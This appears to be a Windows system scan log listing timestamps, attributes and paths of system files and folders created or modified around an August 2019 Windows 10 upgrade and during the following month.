2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\drivers\PEAuth.sys
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\drivers\pdc.sys
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\DolbyMATEnc.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\DolbyHrtfEnc.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\CompPkgSup.dll
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\CompPkgSrv.exe
2019-08-27 19:24:51 ----A---- C:\WINDOWS\system32\AudioSrvPolicyManager.dll
2019-08-27 19:24:50 ----A---- C:\WINDOWS\system32\TaskFlowDataEngine.dll
2019-08-27 19:24:50 ----A---- C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\SYSWOW64\BioCredProv.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\winbio.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\wbiosrvc.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\umpo-overrides.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\energyprov.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\eeprov.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\drivers\http.sys
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\browserbroker.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\browser_broker.exe
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\BioCredProv.dll
2019-08-27 19:24:48 ----A---- C:\WINDOWS\system32\AppReadiness.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\wermgr.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\WerFaultSecure.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\WerFault.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\wer.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\Faultrep.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\SYSWOW64\dbgeng.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\wersvc.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\wermgr.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\WerFaultSecure.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\WerFault.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\wer.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\WaaSMedicSvc.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\WaaSMedicCapsule.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\WaaSMedicAgent.exe
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\srumsvc.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\Faultrep.dll
2019-08-27 19:24:47 ----A---- C:\WINDOWS\system32\dbgeng.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\SYSWOW64\MTF.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\SYSWOW64\dtdump.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wuuhosdeployment.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wuuhext.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wups2.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wups.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wuaueng.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\wuapi.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\WindowsUpdateElevatedInstaller.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\w32tm.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\w32time.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\UsoClient.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\usoapi.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\upshared.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\updatepolicy.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\UpdateAgent.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\SgrmBroker.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\SecureTimeAggregator.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\SDDS.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\ptpprov.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\MusUpdateHandlers.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\MusNotifyIcon.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\MusNotificationUx.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\MusNotification.exe
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\musdialoghandlers.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\MTF.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\JpnServiceDS.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\FilterDS.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\drvsetup.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\diagtrack.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\DDDS.dll
2019-08-27 19:24:46 ----A---- C:\WINDOWS\system32\curl.exe
2019-08-27 19:24:43 ----A---- C:\WINDOWS\SYSWOW64\winhttp.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\SYSWOW64\wevtapi.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\SYSWOW64\netlogon.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\SYSWOW64\mpr.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\SYSWOW64\drvstore.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\wkssvc.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\wevtsvc.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\wevtapi.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\vertdll.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\ucrtbase_enclave.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\tcbloader.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\tcblaunch.exe
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\srvsvc.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\skci.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\securekernel.exe
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\rastls.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\netlogon.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\mpr.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\lsasrv.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\LsaIso.exe
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\kerberos.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\KerbClientShared.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\esent.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drvstore.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drivers\storport.sys
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drivers\ksecpkg.sys
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drivers\fastfat.sys
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drivers\exfat.sys
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\drivers\cng.sys
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\dosvc.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\domgmt.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\DiskSnapshot.exe
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\BingFilterDS.dll
2019-08-27 19:24:43 ----A---- C:\WINDOWS\system32\BingASDS.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\wldp.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\Wldap32.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\userenv.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\ucrtbase.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\tzres.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\oleaut32.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\ncryptprov.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\mswsock.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\logoncli.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\dnsapi.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\dhcpcore6.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\dhcpcore.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\SYSWOW64\cryptdll.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\xmllite.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\wldp.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\Wldap32.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\winquic.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\winhttp.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\wcimage.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\wc_storage.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\userenv.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\ucrtbase.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\tzres.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\schannel.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\samsrv.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\rpcss.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\profsvc.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\oleaut32.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\NtlmShared.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\ncryptprov.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\mswsock.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\msvcp_win.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\msv1_0.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\logoncli.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\KdsCli.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\IPHLPAPI.DLL
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\drivers\winquic.sys
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\drivers\wcnfs.sys
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\drivers\wcifs.sys
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\drivers\bindflt.sys
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\dnsrslvr.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\dnsapi.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\dhcpcore6.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\dhcpcore.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\cryptdll.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\container.dll
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\conhost.exe
2019-08-27 19:24:42 ----A---- C:\WINDOWS\system32\ci.dll
2019-08-27 19:24:41 ----RA---- C:\WINDOWS\system32\icuin.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\Windows.StateRepositoryPS.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\Windows.StateRepository.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\StateRepository.Core.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\propsys.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\netiohlp.dll
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\bcdedit.exe
2019-08-27 19:24:41 ----A---- C:\WINDOWS\system32\AppxPackaging.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\wups.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\wuapi.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\WsmSvc.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\WSManMigrationPlugin.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\WSManHTTPConfig.exe
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\Windows.Graphics.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\winbio.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\wimgapi.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\w32tm.exe
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\updatepolicy.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\spacebridge.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\schannel.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\NtlmShared.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\npmproxy.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\NetSetupShim.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\negoexts.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\msxml6.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\msv1_0.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\kerberos.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\KerbClientShared.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\iscsiwmi.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\FirewallAPI.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\esent.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\SYSWOW64\AcLayers.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\wintrust.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\twinapi.appcore.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\tdh.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\pkeyhelper.dll
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\drivers\winnat.sys
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\drivers\mmcss.sys
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\drivers\ClipSp.sys
2019-08-27 19:24:38 ----A---- C:\WINDOWS\system32\ClipSVC.dll
2019-08-27 19:24:37 ----A---- C:\WINDOWS\SYSWOW64\msxml3.dll
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\vid.dll
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\icsvcext.dll
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\icsvc.dll
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\hvloader.dll
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\drivers\winhvr.sys
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\drivers\winhv.sys
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\drivers\storqosflt.sys
2019-08-27 19:24:36 ----A---- C:\WINDOWS\system32\drivers\hvservice.sys
2019-08-27 19:24:35 ----A---- C:\WINDOWS\system32\computestorage.dll
2019-08-27 19:24:35 ----A---- C:\WINDOWS\system32\computecore.dll
2019-08-27 19:24:33 ----A---- C:\WINDOWS\system32\drivers\iorate.sys
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\WMSPDMOE.DLL
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\objsel.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\nshwfp.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\nlaapi.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\netiohlp.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\SYSWOW64\CoreMessaging.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\system32\WpAXHolder.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\system32\rdpudd.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\system32\rdpnano.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\system32\rdpcorets.dll
2019-08-27 19:24:32 ----A---- C:\WINDOWS\system32\CoreMessaging.dll
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\Vid.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\USBXHCI.SYS
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\usbvideo.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\uefi.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\UcmUcsiAcpiClient.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\tpm.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\stornvme.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\storahci.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\sdbus.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\scmbus.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\processr.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\pmem.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\pci.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\msiscsi.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\kbdhid.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\intelppm.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\intelpep.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\hidparse.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\hidclass.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\dumpsd.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\BTHUSB.SYS
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\bthport.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\bthhfenum.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\bthenum.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\amdppm.sys
2019-08-27 19:24:31 ----A---- C:\WINDOWS\system32\drivers\amdk8.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\vpci.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\volmgr.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\spaceport.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\spacedump.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\netvsc.sys
2019-08-27 19:24:30 ----A---- C:\WINDOWS\system32\drivers\acpi.sys
2019-08-27 19:19:56 ----D---- C:\Program Files\Reference Assemblies
2019-08-27 19:19:56 ----D---- C:\Program Files\MSBuild
2019-08-27 19:19:56 ----D---- C:\Program Files (x86)\Reference Assemblies
2019-08-27 19:19:56 ----D---- C:\Program Files (x86)\MSBuild
2019-08-27 19:19:35 ----A---- C:\WINDOWS\SYSWOW64\TsWpfWrp.exe
2019-08-27 19:19:35 ----A---- C:\WINDOWS\SYSWOW64\PresentationNative_v0300.dll
2019-08-27 19:19:35 ----A---- C:\WINDOWS\SYSWOW64\PresentationCFFRasterizerNative_v0300.dll
2019-08-27 19:19:33 ----A---- C:\WINDOWS\system32\TsWpfWrp.exe
2019-08-27 19:19:33 ----A---- C:\WINDOWS\system32\PresentationNative_v0300.dll
2019-08-27 19:19:33 ----A---- C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2019-08-27 19:19:23 ----A---- C:\WINDOWS\SYSWOW64\XpsFilt.dll
2019-08-27 19:19:22 ----A---- C:\WINDOWS\SYSWOW64\XPSSHHDR.dll
2019-08-27 19:19:22 ----A---- C:\WINDOWS\system32\XPSSHHDR.dll
2019-08-27 19:19:22 ----A---- C:\WINDOWS\system32\XpsFilt.dll
2019-08-27 19:08:36 ----DC---- C:\WINDOWS\Panther
2019-08-27 19:07:27 ----A---- C:\WINDOWS\progress.ini
2019-08-27 18:53:52 ----HD---- C:\$GetCurrent
2019-08-27 18:53:49 ----D---- C:\Windows10Upgrade

======List of files/folders modified in the last 1 month======

2019-09-17 19:43:18 ----D---- C:\WINDOWS\system32\drivers\etc
2019-09-17 19:43:02 ----RD---- C:\Program Files
2019-09-17 19:41:41 ----D---- C:\WINDOWS\Temp
2019-09-17 19:40:49 ----D---- C:\WINDOWS\System32
2019-09-17 19:40:49 ----D---- C:\WINDOWS\INF
2019-09-17 19:39:00 ----D---- C:\WINDOWS\system32\Tasks
2019-09-17 19:38:14 ----D---- C:\Program Files (x86)\Steam
2019-09-17 19:35:52 ----A---- C:\WINDOWS\system32\README.txt
2019-09-17 19:34:46 ----D---- C:\ProgramData\NVIDIA
2019-09-17 19:34:40 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2019-09-17 19:34:36 ----D---- C:\WINDOWS\system32\sru
2019-09-17 12:47:34 ----D---- C:\WINDOWS\LiveKernelReports
2019-09-17 09:37:26 ----HD---- C:\Program Files\WindowsApps
2019-09-17 09:37:13 ----D---- C:\WINDOWS\AppReadiness
2019-09-17 07:57:33 ----RD---- C:\WINDOWS\Microsoft.NET
2019-09-17 07:38:28 ----D---- C:\WINDOWS\system32\WDI
2019-09-15 22:13:20 ----D---- C:\WINDOWS\system32\drivers\UMDF
2019-09-15 05:53:01 ----RD---- C:\Users
2019-09-15 01:41:36 ----D---- C:\WINDOWS\system32\catroot2
2019-09-14 00:01:12 ----D---- C:\WINDOWS\system32\config
2019-09-13 10:08:50 ----SHD---- C:\WINDOWS\Installer
2019-09-13 10:08:50 ----HD---- C:\ProgramData
2019-09-13 10:08:49 ----SHD---- C:\Config.Msi
2019-09-12 09:42:56 ----RD---- C:\WINDOWS\assembly
2019-09-12 09:42:06 ----D---- C:\WINDOWS\WinSxS
2019-09-12 09:40:52 ----D---- C:\ProgramData\Microsoft Help
2019-09-12 09:40:49 ----D---- C:\WINDOWS\CbsTemp
2019-09-12 09:40:47 ----D---- C:\WINDOWS\servicing
2019-09-11 02:51:05 ----D---- C:\WINDOWS\SysWOW64
2019-09-11 02:51:03 ----D---- C:\WINDOWS\system32\DriverStore
2019-09-11 02:44:40 ----SD---- C:\WINDOWS\system32\DiagSvcs
2019-09-11 02:44:40 ----D---- C:\WINDOWS\system32\migration
2019-09-11 02:44:40 ----D---- C:\WINDOWS\system32\drivers
2019-09-11 02:44:40 ----D---- C:\WINDOWS\system32\Boot
2019-09-11 02:44:40 ----D---- C:\WINDOWS\ShellComponents
2019-09-11 02:44:40 ----D---- C:\WINDOWS\bcastdvr
2019-09-11 01:50:13 ----SHD---- C:\System Volume Information
2019-09-11 01:38:47 ----D---- C:\WINDOWS\Logs
2019-09-04 23:27:42 ----D---- C:\WINDOWS\system32\en-US
2019-09-04 21:44:11 ----A---- C:\WINDOWS\SYSWOW64\FlashPlayerApp.exe
2019-09-04 21:14:14 ----D---- C:\WINDOWS\system32\LogFiles
2019-08-29 12:41:51 ----D---- C:\WINDOWS\system32\NDF
2019-08-29 02:15:57 ----D---- C:\WINDOWS\SYSWOW64\en-US
2019-08-28 20:05:17 ----D---- C:\Program Files\rempl
2019-08-28 04:51:24 ----D---- C:\Program Files\UNP
2019-08-28 04:49:48 ----D---- C:\WINDOWS\appcompat
2019-08-27 22:02:59 ----D---- C:\WINDOWS\system32\restore
2019-08-27 20:47:19 ----RSD---- C:\WINDOWS\Fonts
2019-08-27 20:47:19 ----D---- C:\WINDOWS\SYSWOW64\drivers
2019-08-27 20:47:19 ----D---- C:\WINDOWS\system32\WinBioDatabase
2019-08-27 20:47:19 ----D---- C:\WINDOWS\system32\Tasks_Migrated
2019-08-27 20:47:19 ----D---- C:\WINDOWS\system32\spool
2019-08-27 20:47:19 ----D---- C:\WINDOWS\system32\CatRoot
2019-08-27 20:47:19 ----D---- C:\WINDOWS\SHELLNEW
2019-08-27 20:47:19 ----D---- C:\WINDOWS\Registration
2019-08-27 20:47:19 ----D---- C:\WINDOWS\oem
2019-08-27 20:47:18 ----RD---- C:\Program Files (x86)
2019-08-27 20:47:18 ----D---- C:\WINDOWS\Help
2019-08-27 20:47:18 ----D---- C:\Program Files\Microsoft.NET
2019-08-27 20:47:18 ----D---- C:\Program Files\Intel
2019-08-27 20:47:18 ----D---- C:\Program Files\Common Files\system
2019-08-27 20:47:18 ----D---- C:\Program Files\Common Files\microsoft shared
2019-08-27 20:47:18 ----D---- C:\Program Files\Common Files
2019-08-27 20:47:18 ----D---- C:\Program Files (x86)\Microsoft.NET
2019-08-27 20:47:18 ----D---- C:\Program Files (x86)\Common Files
2019-08-27 20:21:35 ----SD---- C:\ProgramData\Microsoft
2019-08-27 20:12:56 ----D---- C:\ProgramData\Packages
2019-08-27 20:10:47 ----D---- C:\WINDOWS\ServiceState
2019-08-27 19:53:47 ----D---- C:\WINDOWS\SoftwareDistribution
2019-08-27 19:53:39 ----D---- C:\WINDOWS\Tasks
2019-08-27 19:53:31 ----D---- C:\Windows
2019-08-27 19:52:10 ----RD---- C:\WINDOWS\PrintDialog
2019-08-27 19:51:56 ----D---- C:\WINDOWS\system32\wbem
2019-08-27 19:50:02 ----D---- C:\ProgramData\USOPrivate
2019-08-27 19:49:37 ----D---- C:\WINDOWS\Firmware
2019-08-27 19:49:22 ----D---- C:\Program Files (x86)\NVIDIA Corporation
2019-08-27 19:49:10 ----D---- C:\Program Files\NVIDIA Corporation
2019-08-27 19:48:14 ----D---- C:\ProgramData\NVIDIA Corporation
2019-08-27 19:48:01 ----D---- C:\WINDOWS\IAStorAfsService
2019-08-27 19:47:51 ----HD---- C:\Recovery
2019-08-27 19:47:51 ----D---- C:\WINDOWS\system32\Recovery
2019-08-27 19:33:24 ----D---- C:\WINDOWS\Setup
2019-08-27 19:31:08 ----D---- C:\WINDOWS\InfusedApps
2019-08-27 19:29:03 ----D---- C:\WINDOWS\system32\oobe
2019-08-27 19:29:03 ----D---- C:\WINDOWS\system32\drivers\RivetNetworks
2019-08-27 19:29:03 ----D---- C:\WINDOWS\system32\drivers\NVIDIA Corporation
2019-08-27 19:28:50 ----D---- C:\WINDOWS\Resources
2019-08-27 19:27:05 ----SD---- C:\WINDOWS\system32\UNP
2019-08-27 19:27:05 ----D---- C:\WINDOWS\TextInput
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\zh-CN
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\uk-UA
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\th-TH
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\sk-SK
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\oobe
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\migration
2019-08-27 19:27:05 ----D---- C:\WINDOWS\SYSWOW64\Dism
2019-08-27 19:27:05 ----D---- C:\WINDOWS\system32\zh-CN
2019-08-27 19:27:05 ----D---- C:\WINDOWS\system32\uk-UA
2019-08-27 19:27:05 ----D---- C:\WINDOWS\system32\th-TH
2019-08-27 19:27:04 ----RD---- C:\WINDOWS\ImmersiveControlPanel
2019-08-27 19:27:04 ----RD---- C:\Program Files\Windows Defender
